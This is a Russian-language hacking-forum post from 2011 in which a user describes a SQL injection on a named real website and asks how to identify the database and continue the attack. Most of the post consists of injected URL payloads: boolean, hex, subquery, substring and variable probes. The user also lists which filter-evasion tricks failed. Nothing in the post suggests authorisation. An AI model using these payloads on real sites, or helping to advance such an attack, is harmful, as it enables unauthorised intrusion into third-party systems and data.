Старый 22.12.2011, 14:01   #1
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию Определить бд, провести атаку

Имеем SQL инъекцию на апорте:
Код:
newyear[dot]aport[dot]ru/2010/?mode=horoscope&hid=2'+and+'1'='1
hex не работает
Код:
hid=2'+and+1=1+and+0x33='3
внутренние запросы не работают
Код:
hid=2'+and+1=1+and+(select 3)='3
chr/ascii/md5/version/user/database/version_compile_os не работают.

Работает substring, есть поддержка переменных
Код:
hid=2'+and+substring(123,1,1)='1'+and+3='3
hid=2'+and+substring(@lol,1,1)=''+and+'3'='3
Однако установить переменной какое-либо значение не удалось.

Любые способы комментирования не работают. (проверялись #(%2B), --, /*)
Образовать пробелы с помощью /**/ не удалось.

Кто-нибудь сталкивался с подобным?
__________________
|
Boolean вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot